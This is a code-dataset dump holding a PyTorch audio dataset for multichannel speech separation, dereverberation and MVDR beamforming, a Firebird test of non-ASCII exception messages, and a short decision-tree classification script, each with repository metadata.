hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
658173776bf6e1aa6395db9260e9462745880428
| 28,191
|
py
|
Python
|
dataloader/data.py
|
yuhogun0908/Forward-Convolutive-Prediction
|
11dea881b70daf45fa2c39883a601c613e2e53f2
|
[
"MIT"
] | 3
|
2022-02-27T12:12:31.000Z
|
2022-03-18T07:01:20.000Z
|
dataloader/data.py
|
ishine/Forward-Convolutive-Prediction
|
11dea881b70daf45fa2c39883a601c613e2e53f2
|
[
"MIT"
] | null | null | null |
dataloader/data.py
|
ishine/Forward-Convolutive-Prediction
|
11dea881b70daf45fa2c39883a601c613e2e53f2
|
[
"MIT"
] | 1
|
2021-12-07T01:18:10.000Z
|
2021-12-07T01:18:10.000Z
|
import numpy as np
import os
import torch
import torch.utils.data as data
import pdb
import pickle
from pathlib import Path
from scipy import signal
import librosa
import scipy
from itertools import permutations
from numpy.linalg import solve
import numpy as np
import soundfile as sf
from convolutive_prediction import Apply_ConvolutivePrediction
class AudioDataset(data.Dataset):
def __init__(self,trainMode, functionMode, num_spks, num_ch, pickle_dir, ref_ch, model,device,cudaUse,check_audio,dereverb_Info,**STFT_args):
super(AudioDataset, self).__init__()
self.trainMode = trainMode
self.functionMode = functionMode
self.model = model
self.fs = STFT_args['fs']
self.window = STFT_args['window']
self.nperseg = STFT_args['length']
self.noverlap = STFT_args['overlap']
self.num_spks = num_spks
self.num_ch = num_ch
self.device = device
self.cudaUse = cudaUse
self.pickle_dir = list(Path(pickle_dir).glob('**/**/**/**/*.pickle'))
hann_win = scipy.signal.get_window('hann', self.nperseg)
self.scale = np.sqrt(1.0 / hann_win.sum()**2)
self.check_audio = check_audio
self.ref_ch = ref_ch
self.dereverb_flag = dereverb_Info[0]
self.predictionType = dereverb_Info[1]
self.tapDelay = dereverb_Info[2]
self.nTap = dereverb_Info[3]
self.reverb_variance_flowValue = dereverb_Info[4]
# self.pickle_dir = self.pickle_dir[0:10]
# # check chunked audio signal
# MAX_INT16 = np.iinfo(np.int16).max
# test= ref2 * MAX_INT16
# test = test.astype(np.int16)
# wf.write('sample_ref2.wav',16000,test)
def STFT(self,time_sig):
'''
input : [T,Nch]
output : [Nch,F,T]
'''
assert time_sig.shape[0] > time_sig.shape[1], "Please check the STFT input dimension, input = [T,Nch] "
num_ch = time_sig.shape[1]
for num_ch in range(num_ch):
# scipy.signal.stft : output : [F range, T range, FxT components]
_,_,stft_ch = signal.stft(time_sig[:,num_ch],fs=self.fs,window=self.window,nperseg=self.nperseg,noverlap=self.noverlap)
# output : [FxT]
stft_ch = np.expand_dims(stft_ch,axis=0)
if num_ch == 0:
stft_chcat = stft_ch
else:
stft_chcat = np.append(stft_chcat,stft_ch,axis=0)
return stft_chcat
def __getitem__(self,index):
with open(self.pickle_dir[index], 'rb') as f:
data_infos = pickle.load(f)
f.close()
mix = data_infos['mix']
mix_stft = self.STFT(mix)
mix_stft = mix_stft/self.scale # scale equality between scipy stft and matlab stft
##################### Todo #########################################################################################################
###################### reference ch로 하도록 mix stft, ref_stft등 circular shift 해야됨.
##############################################################################################################################
assert self.num_spks+1 == len(data_infos), "[ERROR] Check the number of speakers"
ref_stft = [[] for spk_idx in range(self.num_spks)]
for spk_idx in range(self.num_spks):
ref_sig = data_infos['ref'+str(spk_idx+1)]
if len(ref_sig.shape) == 1:
ref_sig = np.expand_dims(ref_sig,axis=1)
ref_stft[spk_idx] = torch.permute(torch.from_numpy(self.STFT(ref_sig)),[0,2,1])
ref_stft[spk_idx] = ref_stft[spk_idx]/self.scale # scale equality between scipy stft and matlab stft
# numpy to torch & reshpae [C,F,T] ->[C,T,F]
mix_stft = torch.permute( torch.from_numpy(mix_stft),[0,2,1])
if self.functionMode == 'Separate':
"""
Output :
mix_stft : [Mic,T,F]
ref_stft : [Mic,T,F]
"""
return torch.roll(mix_stft,-self.ref_ch,dims=0), torch.roll(ref_stft,-self.ref_ch,dims=0)
elif self.functionMode == 'Beamforming':
"""
Output :
mix_stft : [Mic,T,F]
ref_stft : [Mic,T,F]
"""
BeamOutSaveDir = str(self.pickle_dir[index]).replace('CleanMix','Beamforming')
MISO1OutSaveDir = str(self.pickle_dir[index]).replace('CleanMix','MISO1')
return mix_stft, ref_stft, BeamOutSaveDir, MISO1OutSaveDir
elif 'Enhance' in self.functionMode:
"""
Output :
mix_stft : [Mic,T,F]
ref_stft_1ch, list, [Mic,T,F]
MISO1_stft, list, [Mic,T,F]
Beamform_stft, list, [Mic,T,F]
"""
if len(mix_stft.shape)==3:
mix_stft = torch.unsqueeze(mix_stft,dim=0)
if self.cudaUse:
mix_stft = mix_stft.cuda(self.device)
ref_stft_1ch = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
if len(ref_stft[spk_idx].shape) == 3:
ref_stft[spk_idx] = torch.unsqueeze(ref_stft[spk_idx], dim=0)
ref_stft_1ch[spk_idx] = ref_stft[spk_idx][:,self.ref_ch,:,:] # select reference mic channel
ref_stft_1ch[spk_idx] = torch.unsqueeze(ref_stft_1ch[spk_idx], dim=1)
B, Mic, T, F = mix_stft.size()
"""
Apply Source Separation
"""
if self.functionMode == 'Enhance_Load_MISO1_Output' or self.functionMode == 'Enhance_Load_MISO1_MVDR_Output':
MISO1OutSaveDir = str(self.pickle_dir[index]).replace('CleanMix','MISO1')
MISO1_stft = [[] for _ in range(self.num_spks)]
# Load MISO1 Output
for spk_idx in range(self.num_spks):
spk_name = '_s{}.wav'.format(spk_idx+1)
MISO1_sig, fs = librosa.load(MISO1OutSaveDir.replace('.pickle',spk_name), mono= False, sr= 8000)
if MISO1_sig.shape[1] != self.num_ch:
MISO1_sig = MISO1_sig.T
assert fs == self.fs, 'Check sampling rate'
if len(MISO1_sig.shape) == 1:
MISO1_sig = np.expand_dims(MISO1_sig, axis=1)
MISO1_stft[spk_idx] = torch.permute(torch.from_numpy(self.STFT(MISO1_sig)),[0,2,1])
MISO1_stft[spk_idx] = MISO1_stft[spk_idx]/self.scale
# MISO1_spk1 = torch.unsqueeze(MISO1_stft[0],dim=0)
# MISO1_spk2 = torch.unsqueeze(MISO1_stft[1],dim=0)
else:
MISO1_stft = self.MISO1_Inference(mix_stft, ref_ch = self.ref_ch)
if self.cudaUse:
mix_stft = mix_stft.detach().cpu()
for spk_idx in range(self.num_spks):
MISO1_stft[spk_idx] = MISO1_stft[spk_idx].detach().cpu()
"""
Source Alignment between Clean reference signal and MISO1 signal
calculate magnitude distance between ref mic(ch0) and target signal(reference mic : ch0)
"""
for spk_idx in range(self.num_spks):
if spk_idx == 0 :
ref_ = ref_stft_1ch[spk_idx]
s_MISO1 = MISO1_stft[spk_idx][:,0,:,:] # [B,T,F]
else:
ref_ = torch.cat((ref_,ref_stft_1ch[spk_idx]), dim=1)
s_MISO1 = torch.stack((s_MISO1, MISO1_stft[spk_idx][:,0,:,:]), dim=1)
s_MISO1_ = torch.unsqueeze(s_MISO1,dim=2) #[B,Spks,1,T,F]
magnitude_MISO1 = torch.abs(torch.sqrt(s_MISO1_.real**2 + s_MISO1_.imag**2)) #[B,Spks,1,T,F]
s_ref = torch.unsqueeze(ref_, dim=1)
magnitude_distance = torch.sum(torch.abs(magnitude_MISO1 - abs(s_ref)),[3,4])
perms = ref_.new_tensor(list(permutations(range(self.num_spks))), dtype=torch.long) #[[0,1],[1,0]]
index_ = torch.unsqueeze(perms, dim=2)
perms_one_hot = ref_.new_zeros((*perms.size(), self.num_spks), dtype=torch.float).scatter_(2,index_,1)
batchwise_distance = torch.einsum('bij,pij->bp',[magnitude_distance, perms_one_hot])
min_distance_idx = torch.argmin(batchwise_distance, dim=1)
for batch_idx in range(B):
align_index = torch.argmax(perms_one_hot[min_distance_idx[batch_idx]], dim=1)
for spk_idx in range(self.num_spks):
target_index = align_index[spk_idx]
ref_stft_1ch[spk_idx] = torch.unsqueeze(ref_[batch_idx,target_index,...],dim=0)
"""
Apply Dereverberation Method
1. WPE : weighted prediction error
2. ICP : inverse convolutive prediction
3. FCP : forward convolutive prediction
4. cFCP : combine forward convolutive prediction
"""
if self.dereverb_flag :
dereverb_stft = [[] for _ in range(self.num_spks)]
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
if self.predictionType == 'cFCP':
source = [torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy() for spk_idx in range(self.num_spks)]
dereverb_stft = Apply_ConvolutivePrediction(observe,source,self.num_spks,self.predictionType,self.tapDelay,self.nTap,self.reverb_variance_flowValue)
elif self.predictionType == 'test':
source = [torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy() for spk_idx in range(self.num_spks)]
dereverb_stft = Apply_ConvolutivePrediction(observe,source,self.num_spks,self.predictionType,self.tapDelay,self.nTap,self.reverb_variance_flowValue)
else:
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
dereverb_stft[spk_idx] = Apply_ConvolutivePrediction(observe,source,self.num_spks,self.predictionType,self.tapDelay,self.nTap,self.reverb_variance_flowValue)
#################################
########### Testcode ###########
#################################
# WPE
DNN_WPE_dereverb_stft = [[] for _ in range(self.num_spks)]
FCP_dereverb_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
DNN_WPE_dereverb_stft[spk_idx] = Apply_ConvolutivePrediction(observe,source,self.num_spks,'DNN_WPE',self.tapDelay,self.nTap,self.reverb_variance_flowValue)
# FCP
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
FCP_dereverb_stft[spk_idx] = Apply_ConvolutivePrediction(observe,source,self.num_spks,'FCP',self.tapDelay,self.nTap,self.reverb_variance_flowValue)
#################################
########### Testcode ###########
#################################
"""
Apply MVDR Beamforming
"""
if self.functionMode == 'Enhance_Load_MVDR_Output' or self.functionMode == 'Enhance_Load_MISO1_MVDR_Output':
BeamformSaveDir = str(self.pickle_dir[index]).replace('CleanMix','Beamforming')
Beamform_stft = [[] for _ in range(self.num_spks)]
# Load MISO1 Output
for spk_idx in range(self.num_spks):
spk_name = '_s{}.wav'.format(spk_idx+1)
Beamform_sig, fs = librosa.load(BeamformSaveDir.replace('.pickle',spk_name), mono= False, sr= 8000)
if len(Beamform_sig.shape) == 1:
Beamform_sig = np.expand_dims(Beamform_sig, axis=1)
assert fs == self.fs, 'Check sampling rate'
Beamform_stft[spk_idx] = torch.permute(torch.from_numpy(self.STFT(Beamform_sig)),[0,2,1])
Beamform_stft[spk_idx] = Beamform_stft[spk_idx]/self.scale
else:
Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
if self.dereverb_flag :
observe = torch.permute(dereverb_stft[spk_idx],[0,3,1,2])
else:
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu()
Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
#################################
########### Testcode ###########
#################################
DNN_WPE_Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(DNN_WPE_dereverb_stft[spk_idx],[0,3,1,2])
DNN_WPE_Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
FCP_Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(FCP_dereverb_stft[spk_idx],[0,3,1,2])
FCP_Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
Origin_Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2])
Origin_Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
#################################
########### Testcode ###########
#################################
if len(mix_stft.shape)== 4:
mix_stft = torch.squeeze(mix_stft)
for spk_idx in range(self.num_spks):
if len(MISO1_stft[spk_idx].shape)== 4:
MISO1_stft[spk_idx] = torch.squeeze(MISO1_stft[spk_idx])
if len(dereverb_stft[spk_idx].shape)==4:
dereverb_stft[spk_idx] = torch.squeeze(dereverb_stft[spk_idx])
if self.check_audio:
''' Check the result of MISO1 '''
self.save_audio(np.transpose(mix_stft, [0,2,1]), 'mix')
for spk_idx in range(self.num_spks):
self.save_audio(np.transpose(ref_stft_1ch[spk_idx], [0,2,1]), 'ref_s{}'.format(spk_idx))
self.save_audio(np.transpose(MISO1_stft[spk_idx], [0,2,1]), 'MISO1_s{}'.format(spk_idx))
if self.dereverb_flag:
self.save_audio(np.transpose(dereverb_stft[spk_idx], [0,2,1]), self.predictionType+'_s{}'.format(spk_idx))
self.save_audio(np.transpose(Beamform_stft[spk_idx], [0,2,1]), self.predictionType+'_Beamform_s{}'.format(spk_idx))
else:
self.save_audio(np.transpose(Beamform_stft[spk_idx], [0,2,1]), 'Beamform_s{}'.format(spk_idx))
#################################
########### Testcode ###########
#################################
#WPE
self.save_audio(np.transpose(np.squeeze(DNN_WPE_dereverb_stft[spk_idx],axis=0), [0,2,1]), 'DNN_WPE_s{}'.format(spk_idx))
self.save_audio(np.transpose(DNN_WPE_Beamform_stft[spk_idx], [0,2,1]), 'DNN_WPE_Beamform_s{}'.format(spk_idx))
#FCP
self.save_audio(np.transpose(np.squeeze(FCP_dereverb_stft[spk_idx],axis=0), [0,2,1]), 'FCP_s{}'.format(spk_idx))
self.save_audio(np.transpose(FCP_Beamform_stft[spk_idx], [0,2,1]), 'FCP_Beamform_s{}'.format(spk_idx))
#Origin Beamforming
self.save_audio(np.transpose(Origin_Beamform_stft[spk_idx], [0,2,1]), 'Origin_Beamform_s{}'.format(spk_idx))
#################################
########### Testcode ###########
#################################
pdb.set_trace()
return mix_stft, ref_stft_1ch, MISO1_stft, Beamform_stft
else:
assert -1, '[Error] Choose correct train mode'
def save_audio(self,signal, wavname):
'''
Input:
signal : [Ch,F,T]
wavename : str, wav name to save
'''
hann_win = scipy.signal.get_window(self.window, self.nperseg)
scale = np.sqrt(1.0 / hann_win.sum()**2)
MAX_INT16 = np.iinfo(np.int16).max
signal = signal * scale
t_sig = self.ISTFT(signal)
t_sig= t_sig * MAX_INT16
t_sig = t_sig.astype(np.int16)
sf.write('{}.wav'.format(wavname),t_sig.T, self.fs,'PCM_24')
def ISTFT(self,FT_sig):
'''
input : [F,T]
output : [T,C]
'''
# if FT_sig.shape[1] != self.config['ISTFT']['length']+1:
# FT_sig = np.transpose(FT_sig,(0,1)) # [C,T,F] -> [C,F,T]
_, t_sig = signal.istft(FT_sig,fs=self.fs, window=self.window, nperseg=self.nperseg, noverlap=self.noverlap) #[C,F,T] -> [T,C]
return t_sig
def MISO1_Inference(self,mix_stft,ref_ch=0):
"""
Input:
mix_stft : observe STFT, size - [B, Mic, T, F]
Output:
MISO1_stft : list of separated source, - [B, reference Mic, T, F]
1. circular shift the microphone array at run time for the prediction of each microphone signal
If the microphones are arranged uniformly on a circle, Select the reference microphone by circular shifting the microphone. e.g reference mic q -> [Yq, Yq+1, ..., Yp, Y1, ..., Yq-1]
2. Using Permutation Invariance Alignmnet method to match between clean target signal and estimated signal
"""
B, M, T, F = mix_stft.size()
MISO1_stft = [torch.empty(B,M,T,F, dtype=torch.complex64) for _ in range(self.num_spks)]
Mic_array = [x for x in range(M)]
Mic_array = np.roll(Mic_array, -ref_ch) # [ref_ch, ref_ch+1, ..., 0, 1, ..., ref_ch-1]
# print('Mic_array : ', Mic_array)
with torch.no_grad():
mix_stft_refCh = torch.roll(mix_stft,-ref_ch, dims=1)
MISO1_refCh = self.model(mix_stft_refCh)
for spk_idx in range(self.num_spks):
MISO1_stft[spk_idx][:,ref_ch,...] = MISO1_refCh[:,spk_idx,...]
# MISO1_spk1[:,ref_ch,...] = MISO1_refCh[:,0,...]
# MISO1_spk2[:,ref_ch,...] = MISO1_refCh[:,1,...]
s_MISO1_refCh = torch.unsqueeze(MISO1_refCh, dim=2)
s_Magnitude_refCh = torch.abs(torch.sqrt(s_MISO1_refCh.real**2 + s_MISO1_refCh.imag**2)) # [B,Spks,1,T,F]
with torch.no_grad():
for shiftIdx in Mic_array[1:]:
# print('shift Micnumber', shiftIdx)
mix_stft_shift = torch.roll(mix_stft,-shiftIdx, dims=1)
MISO1_chShift = self.model(mix_stft_shift)
s_MISO1_chShift = torch.unsqueeze(MISO1_chShift, dim=1) #[B,1,Spks,T,F]
s_magnitude_chShift = torch.sum(torch.abs(s_Magnitude_refCh - abs(s_MISO1_chShift)),[3,4]) #[B,Spks,Spks,T,F]
perms = MISO1_chShift.new_tensor(list(permutations(range(self.num_spks))), dtype=torch.long)
index_ = torch.unsqueeze(perms, dim=2)
perms_one_hot = MISO1_chShift.new_zeros((*perms.size(), self.num_spks), dtype=torch.float).scatter_(2,index_,1)
batchwise_distance = torch.einsum('bij,pij->bp', [s_magnitude_chShift, perms_one_hot])
min_distance_idx = torch.argmin(batchwise_distance,dim=1)
for batch_idx in range(B):
align_index = torch.argmax(perms_one_hot[min_distance_idx[batch_idx]],dim=1)
for spk_idx in range(self.num_spks):
target_index = align_index[spk_idx]
MISO1_stft[spk_idx][:,shiftIdx,...] = MISO1_chShift[batch_idx,target_index,...]
return MISO1_stft
def Apply_Beamforming(self, source_stft, mix_stft, epsi=1e-6):
"""
Input :
mix_stft : observe STFT, size - [B, F, Ch, T], np.ndarray
source_stft : estimated source STFT, size - [B, F, Ch, T], np.ndarray
Output :
Beamform_stft : MVDR Beamforming output, size - [B, 1, T, F], np.ndarray
1. estimate target steering using EigenValue decomposition
2. get source, noise Spatial Covariance Matrix, S = 1/T * xx_h
3. MVDR Beamformer
"""
B, F, M, T = source_stft.shape
# Apply small Diagonal matrix to prevent matrix inversion error
eye = np.eye(M)
eye = eye.reshape(1,1,M,M)
delta = epsi * np.tile(eye,[B,F,1,1])
''' Source '''
source_SCM = self.get_spatial_covariance_matrix(source_stft,normalize=True) # target covariance matrix, size : [B,F,C,C]
source_SCM = 0.5 * (source_SCM + np.conj(source_SCM.swapaxes(-1,-2))) # verify hermitian symmetric
''' Noise Spatial Covariance '''
noise_signal = mix_stft - source_stft
# s1_noise_signal = mix_stft #MPDR
noise_SCM = self.get_spatial_covariance_matrix(noise_signal,normalize = True) # noise covariance matrix, size : [B,F,C,C]
# s1_SCMn = self.condition_covariance(s1_SCMn, 1e-6)
# s1_SCMn /= np.trace(s1_SCMn, axis1=-2, axis2= -1)[...,None, None]
noise_SCM = 0.5 * (noise_SCM + np.conj(noise_SCM.swapaxes(-1,-2))) # verify hermitian symmetric
''' Get Steering vector : Eigen-decomposition '''
shape = source_SCM.shape
source_steering = np.empty(shape[:-1], dtype=np.complex)
# s1_SCMs += delta
source_SCM = np.reshape(source_SCM, (-1,) + shape[-2:])
eigenvals, eigenvecs = np.linalg.eigh(source_SCM)
# Find max eigenvals
vals = np.argmax(eigenvals, axis=-1)
# Select eigenvec for max eigenval
source_steering = np.array([eigenvecs[i,:,vals[i]] for i in range(eigenvals.shape[0])])
# s1_steering = np.array([eigenvecs[i,:,vals[i]] * np.sqrt(Mic/np.linalg.norm(eigenvecs[i,:,vals[i]])) for i in range(eigenvals.shape[0])]) # [B*F,Ch,Ch]
source_steering = np.reshape(source_steering, shape[:-1]) # [B,F,Ch]
source_SCM = np.reshape(source_SCM, shape)
''' steering normalize with respect to the reference microphone '''
# ver 1
source_steering = source_steering / np.expand_dims(source_steering[:,:,0], axis=2)
for b_idx in range(0,B):
for f_idx in range(0,F):
# s1_steering[b_idx,f_idx,:] = s1_steering[b_idx,f_idx,:] / s1_steering[b_idx,f_idx,0]
source_steering[b_idx,f_idx,:] = source_steering[b_idx,f_idx,:] * np.sqrt(M/(np.linalg.norm(source_steering[b_idx,f_idx,:])))
# ver 2
# s1_steering = self.normalize(s1_steering)
source_steering = self.PhaseCorrection(source_steering)
beamformer = self.get_mvdr_beamformer(source_steering, noise_SCM, delta)
# s1_beamformer = self.blind_analytic_normalization(s1_beamformer,s1_SCMn)
source_bf = self.apply_beamformer(beamformer,mix_stft)
source_bf = torch.permute(torch.from_numpy(source_bf), [0,2,1])
return source_bf
def get_spatial_covariance_matrix(self,observation,normalize):
'''
Input :
observation : complex
size : [B,F,C,T]
Return :
R : double
size : [B,F,C,C]
'''
B,F,C,T = observation.shape
R = np.einsum('...dt,...et-> ...de', observation, observation.conj())
if normalize:
normalization = np.sum(np.ones((B,F,1,T)),axis=-1, keepdims=True)
R /= normalization
return R
def PhaseCorrection(self,W): #Matlab과 동일
"""
Phase correction to reduce distortions due to phase inconsistencies.
Input:
W : steering vector
size : [B,F,Ch]
"""
w = W.copy()
B, F, Ch = w.shape
for b_idx in range(0,B):
for f in range(1, F):
w[b_idx,f, :] *= np.exp(-1j*np.angle(
np.sum(w[b_idx,f, :] * w[b_idx,f-1, :].conj(), axis=-1, keepdims=True)))
return w
def condition_covariance(self,x,gamma):
"""see https://stt.msu.edu/users/mauryaas/Ashwini_JPEN.pdf (2.3)"""
B,F,_,_ = x.shape
for b_idx in range(0,B):
scale = gamma * np.trace(x[b_idx,...]) / x[b_idx,...].shape[-1]
scaled_eye = np.eye(x.shape[-1]) * scale
x[b_idx,...] = (x[b_idx,...]+scaled_eye) / (1+gamma)
return x
def normalize(self,vector):
B,F,Ch = vector.shape
for b_idx in range(0,B):
for ii in range(0,F):
weight = np.matmul(np.conjugate(vector[b_idx,ii,:]).reshape(1,-1), vector[b_idx,ii,:])
vector[b_idx,ii,:] = (vector[b_idx,ii,:] / weight)
return vector
def blind_analytic_normalization(self,vector, noise_psd_matrix, eps=0):
"""Reduces distortions in beamformed ouptput.
:param vector: Beamforming vector
with shape (..., sensors)
:param noise_psd_matrix:
with shape (..., sensors, sensors)
:return: Scaled Deamforming vector
with shape (..., sensors)
"""
nominator = np.einsum(
'...a,...ab,...bc,...c->...',
vector.conj(), noise_psd_matrix, noise_psd_matrix, vector
)
nominator = np.abs(np.sqrt(nominator))
denominator = np.einsum(
'...a,...ab,...b->...', vector.conj(), noise_psd_matrix, vector
)
denominator = np.abs(denominator)
normalization = nominator / (denominator + eps)
return vector * normalization[..., np.newaxis]
def get_mvdr_beamformer(self, steering_vector, R_noise, delta):
"""
Returns the MVDR beamformers vector
Input :
steering_vector : Acoustic transfer function vector
shape : [B, F, Ch]
R_noise : Noise spatial covariance matrix
shape : [B, F, Ch, Ch]
"""
R_noise += delta
numer = solve(R_noise, steering_vector)
denom = np.einsum('...d,...d->...', steering_vector.conj(), numer)
beamformer = numer / np.expand_dims(denom, axis=-1)
return beamformer
def apply_beamformer(self, beamformer, mixture):
return np.einsum('...a,...at->...t',beamformer.conj(), mixture)
def __len__(self):
return len(self.pickle_dir)
| 47.943878
| 196
| 0.545564
| 27,862
| 0.987559
| 0
| 0
| 0
| 0
| 0
| 0
| 7,428
| 0.263283
|
6582ec795f9be718fba1c563c5c66e44261c6ce1
| 3,053
|
py
|
Python
|
tests/bugs/core_4160_test.py
|
reevespaul/firebird-qa
|
98f16f425aa9ab8ee63b86172f959d63a2d76f21
|
[
"MIT"
] | null | null | null |
tests/bugs/core_4160_test.py
|
reevespaul/firebird-qa
|
98f16f425aa9ab8ee63b86172f959d63a2d76f21
|
[
"MIT"
] | null | null | null |
tests/bugs/core_4160_test.py
|
reevespaul/firebird-qa
|
98f16f425aa9ab8ee63b86172f959d63a2d76f21
|
[
"MIT"
] | null | null | null |
#coding:utf-8
#
# id: bugs.core_4160
# title: Parameterized exception does not accept not ASCII characters as parameter
# decription:
# tracker_id: CORE-4160
# min_versions: ['3.0']
# versions: 3.0
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = [('-At procedure.*', '')]
init_script_1 = """
create or alter procedure sp_alert(a_lang char(2), a_new_amount int) as begin end;
commit;
recreate exception ex_negative_remainder ' @1 (@2)';
commit;
"""
db_1 = db_factory(page_size=4096, charset='UTF8', sql_dialect=3, init=init_script_1)
test_script_1 = """
set term ^;
create or alter procedure sp_alert(a_lang char(2), a_new_amount int) as
begin
if (a_lang = 'cz') then
exception ex_negative_remainder using ('Czech: New Balance bude menší než nula', a_new_amount);
else if (a_lang = 'pt') then
exception ex_negative_remainder using ('Portuguese: New saldo será menor do que zero', a_new_amount);
else if (a_lang = 'dm') then
exception ex_negative_remainder using ('Danish: New Balance vil være mindre end nul', a_new_amount);
else if (a_lang = 'gc') then
exception ex_negative_remainder using ('Greek: Νέα ισορροπία θα είναι κάτω από το μηδέν', a_new_amount);
else if (a_lang = 'fr') then
exception ex_negative_remainder using ('French: Nouveau solde sera inférieur à zéro', a_new_amount);
else
exception ex_negative_remainder using ('Russian: Новый остаток будет меньше нуля', a_new_amount);
end
^
set term ;^
commit;
execute procedure sp_alert('cz', -1);
execute procedure sp_alert('pt', -2);
execute procedure sp_alert('dm', -3);
execute procedure sp_alert('gc', -4);
execute procedure sp_alert('fr', -5);
execute procedure sp_alert('jp', -6);
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stderr_1 = """
Statement failed, SQLSTATE = HY000
exception 1
-EX_NEGATIVE_REMAINDER
- Czech: New Balance bude menší než nula (-1)
Statement failed, SQLSTATE = HY000
exception 1
-EX_NEGATIVE_REMAINDER
- Portuguese: New saldo será menor do que zero (-2)
Statement failed, SQLSTATE = HY000
exception 1
-EX_NEGATIVE_REMAINDER
- Danish: New Balance vil være mindre end nul (-3)
Statement failed, SQLSTATE = HY000
exception 1
-EX_NEGATIVE_REMAINDER
- Greek: Νέα ισορροπία θα είναι κάτω από το μηδέν (-4)
Statement failed, SQLSTATE = HY000
exception 1
-EX_NEGATIVE_REMAINDER
- French: Nouveau solde sera inférieur à zéro (-5)
Statement failed, SQLSTATE = HY000
exception 1
-EX_NEGATIVE_REMAINDER
- Russian: Новый остаток будет меньше нуля (-6)
"""
@pytest.mark.version('>=3.0')
def test_1(act_1: Action):
act_1.expected_stderr = expected_stderr_1
act_1.execute()
assert act_1.clean_expected_stderr == act_1.clean_stderr
| 31.802083
| 113
| 0.681625
| 0
| 0
| 0
| 0
| 183
| 0.057385
| 0
| 0
| 2,700
| 0.84666
|
658406b3a8a1489ae1dff93411406c5f22d90b10
| 784
|
py
|
Python
|
12_TreeClassification3D/main.py
|
ManMohan291/PyProgram
|
edcaa927bd70676bd14355acad7262ae2d32b8e5
|
[
"MIT"
] | 2
|
2018-09-07T17:44:54.000Z
|
2018-09-07T17:44:57.000Z
|
12_TreeClassification3D/main.py
|
ManMohan291/PyProgram
|
edcaa927bd70676bd14355acad7262ae2d32b8e5
|
[
"MIT"
] | null | null | null |
12_TreeClassification3D/main.py
|
ManMohan291/PyProgram
|
edcaa927bd70676bd14355acad7262ae2d32b8e5
|
[
"MIT"
] | null | null | null |
import TreeClassification as T
T.clearScreen()
dataTraining= T.loadData("dataTraining.txt")
X=dataTraining[:,0:3]
y=dataTraining[:,3:4]
Threshold=30
#Training
TrainedTree = T.SplitTree(X, y,ThresholdCount=Threshold)
newX,newY=T.PredictTree(X,y,TrainedTree)
#CheckAccuracy
Xy=T.concatenateVectors(X,y) #Merge dataset to sort order again
NewXy=T.concatenateVectors(newX,newY) #Compare requires sorting as Tree shuffled the data in leaf nodes
Accuracy=T.accurracy(Xy,NewXy)
print("Traning accuracy(",Accuracy,"%).")
#Ploting
plt=T.getPlot()
fig = plt.figure()
ax = fig.add_subplot(121, projection='3d')
T.PlotPoints(ax,X,y)
ax = fig.add_subplot(122, projection='3d')
T.PlotTree(ax,X,y,TrainedTree)
plt.show()
#Print Tree
T.PrintTree(TrainedTree)
| 20.631579
| 110
| 0.732143
| 0
| 0
| 0
| 0
